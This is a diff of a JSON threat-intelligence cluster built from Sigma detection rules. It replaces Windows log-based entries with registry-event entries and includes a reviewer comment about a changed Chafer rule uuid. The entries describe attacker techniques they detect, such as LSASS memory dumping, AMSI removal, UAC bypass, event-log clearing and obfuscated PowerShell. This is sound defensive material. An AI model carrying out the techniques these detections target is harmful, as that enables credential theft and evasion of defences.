"https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" ], - "tags": "No established tags" + "tags": [ + "attack.resource_development", + "attack.t1608" + ] }, - "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", - "value": "User Logoff Event" + "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "value": "HybridConnectionManager Service Installation - Registry" }, { - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/10/20", "falsepositive": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." 
+ "Unknown" ], - "filename": "win_security_vssaudit_secevent_source_registration.yml", - "level": "informational", - "logsource.category": "No established category", + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" ], "tags": [ "attack.credential_access", "attack.t1003.002" ] }, - "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", - "value": "VSSAudit Security Event Source Registration" + "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", + "value": "Esentutl Volume Shadow Copy Service Keys" }, { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "creation_date": "2020/10/12", + "author": "Christian Burkard", + "creation_date": "2021/08/30", "falsepositive": [ "Unknown" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "filename": "registry_event_shell_open_keys_manipulation.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" - }, - { - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "meta": { - "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", - "creation_date": "2017/08/22", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "filename": "win_security_wmi_persistence.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" - ], - "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1548.002", + "attack.t1546.001" ] }, - "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", - "value": "WMI Persistence - Security" + "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "value": "Shell Open Registry Keys Manipulation" }, { - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "description": "Detects FlowCloud malware from threat group TA410.", "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/08/02", + "author": "NVISO", + "creation_date": "2020/06/09", "falsepositive": [ "Unknown" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_mal_flowcloud.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "value": "Microsoft Defender Blocked from Loading Unsigned DLL" - }, - { - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": 
"win_security_mitigations_unsigned_dll_from_susp_location.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "value": "Unsigned Binary Loaded From Suspicious Location" - }, - { - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
- ], - "filename": "win_hybridconnectionmgr_svc_running.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" ], "tags": [ "attack.persistence", - "attack.t1554" + "attack.t1112" ] }, - "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "value": "HybridConnectionManager Service Running" + "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "value": "FlowCloud Malware" }, { - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", + "author": "Florian Roth", + "creation_date": "2021/02/26", "falsepositive": [ - "Packages or applications being legitimately used by users or administrators" + "Unlikely" ], - "filename": "win_shell_core_susp_packages_installed.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_event_silentprocessexit_lsass.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": 
"83c161b6-ca67-4f33-8ad0-644a0737cf07", - "value": "Suspicious Application Installed" - }, - { - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "meta": { - "author": "Florian Roth, KevTheHermit, fuzzyf10w", - "creation_date": "2021/06/30", - "falsepositive": [ - "Account fallback reasons (after failed login with specific account)" - ], - "filename": "win_susp_failed_guest_logon.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/KevTheHermit/status/1410203844064301056", - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" ], "tags": [ "attack.credential_access", - "attack.t1110.001" + "attack.t1003.001" ] }, - "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", - "value": "Suspicious Rejected SMB Guest Logon From IP" + "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", + "value": "Potential Credential Dumping Via LSASS SilentProcessExit Technique" }, { - "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "meta": { - "author": "Fabian Franz", - "creation_date": "2022/08/30", - "falsepositive": [ - "Legitimate administrative activity", - "Faulty scripts" - ], - "filename": 
"win_susp_failed_hidden_share_mount.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/moti_b/status/1032645458634653697", - "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" - ], - "tags": [ - "attack.t1021.002", - "attack.lateral_movement" - ] - }, - "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", - "value": "Failed Mounting of Hidden Share" - }, - { - "description": "Detects application popup reporting a failure of the Sysmon service", - "meta": { - "author": "Tim Shelton", - "creation_date": "2022/04/26", + "author": "frack113", + "creation_date": "2022/12/11", "falsepositive": [ "Unknown" ], - "filename": "win_system_application_sysmon_crash.yml", + "filename": "registry_set_legalnotice_susp_message.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_set_legalnotice_susp_message.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.impact", + "attack.t1491.001" ] }, - "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "value": "Sysmon Crash" - }, - { - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/31", - "falsepositive": [ - "Unknown" - ], - 
"filename": "win_system_apt_carbonpaper_turla.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" - ] - }, - "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "value": "Turla Service Install" + "uuid": "8b9606c9-28be-4a38-b146-0e313cc232c1", + "value": "Potential Ransomware Activity Using LegalNotice Message" }, { "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", @@ -18628,13 +11747,13 @@ "falsepositive": [ "Unknown" ], - "filename": "win_system_apt_chafer_mar18_system.yml", + "filename": "registry_event_apt_chafer_mar18.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" ], "tags": [ "attack.persistence", 
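Review bot: The entry changed in this hunk is a different Sigma rule, not a renamed one: the new `"filename": "registry_event_apt_chafer_mar18.yml"` with `"logsource.category": "registry_event"` covers registry events, while the removed `win_system_apt_chafer_mar18_system.yml` covered the system log, and the entry's uuid changes in the following hunk (`53ba33fd-…` to `7bdf2a7c-…`), so anything in MISP keyed on the old uuid silently loses its match unless the system rule is emitted elsewhere in the regenerated file, which is not visible here. Because the shared `"description"` line is context, git pairs the two rules as an edit and hides that detection coverage for the service-install variant may have been dropped; please confirm the old uuid still appears in the new cluster and, if the file is produced by a generator, that it does not collapse rules that share a description. Separately, the added ref `https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml` points at `master`, and this diff itself shows rule paths move between regenerations, so the link will rot; pinning it to the SigmaHQ commit the cluster was generated from (a `.../blob/<sigma-commit>/rules/...` URL) would keep the reference resolvable.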
@@ -18648,1656 +11767,2194 @@ "attack.t1071.004" ] }, - "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "value": "Chafer Activity - System" + "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "value": "Chafer Activity - Registry" }, { - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "description": "Detects Pandemic Windows Implant", "meta": { "author": "Florian Roth", - "creation_date": "2017/03/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_system_apt_stonedrill.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" - ] - }, - "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "value": "StoneDrill Service Install" - }, - { - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/11/23", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_system_apt_turla_service_png.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" - ] - }, - "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "value": "Turla PNG Dropper Service" - }, - { - "description": "Detects known malicious service installs that 
appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "meta": { - "author": "Florian Roth, Wojciech Lesicki", - "creation_date": "2021/05/26", + "creation_date": "2017/06/01", "falsepositive": [ "Unknown" ], - "filename": "win_system_cobaltstrike_service_installs.yml", + "filename": "registry_event_apt_pandemic.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" ], "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1105" ] }, - "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", - "value": "CobaltStrike Service Installations - System" + "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "value": "Pandemic Registry Key" }, { - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", "meta": { - "author": "Ján Trenčanský, frack113", - "creation_date": "2020/07/28", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", "falsepositive": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" + "Unknown" ], - "filename": "win_system_defender_disabled.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "value": "Removal Of Index Value to Hide Schedule Task" + }, + { + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_mstsc_history_cleared.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" + ] + }, + "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "value": "Terminal Server Client 
Connection History Cleared" + }, + { + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "meta": { + "author": "Sittikorn S", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "value": "Removal Of SD Value to Hide Schedule Task" + }, + { + "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_delete_removal_amsi_registry_key.yml", + "level": "high", + "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": 
"6c0a7755-6d31-44fa-80e1-133e57752680", - "value": "Windows Defender Threat Detection Disabled - Service" + "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", + "value": "Removal Of Amsi Provider Reg Key" }, { - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process", "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Legitimate administrators removing applications (should always be monitored)" ], - "filename": "win_system_eventlog_cleared.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", - "value": "Eventlog Cleared" - }, - { - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "meta": { - "author": "Omer Faruk Celik", - "creation_date": "2018/03/20", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_hack_smbexec.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ] - }, - "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", - "value": "smbexec.py Service Installation" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_clip_services.yml", + "filename": "registry_delete_exploit_guard_protected_folders.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ] }, - "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher - System" + "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "value": "Removal Of Folder From ProtectedFolders In Exploit Guard" }, { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "description": "A General detection to trigger for processes removing 
.*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", "falsepositive": [ - "Unknown" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher - System" - }, - { - "description": "Detects Obfuscated use 
of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_var_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "value": "Invoke-Obfuscation VAR+ Launcher - System" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "filename": "registry_delete_removal_com_hijacking_registry_key.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1112" ] }, - "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" + "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "value": "Removal of Potential COM Hijacking Registry Keys" }, { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "description": "Detects COM object hijacking via TreatAs subkey", "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/23", "falsepositive": [ - "Unknown" + "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "filename": "registry_add_persistence_key_linking.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 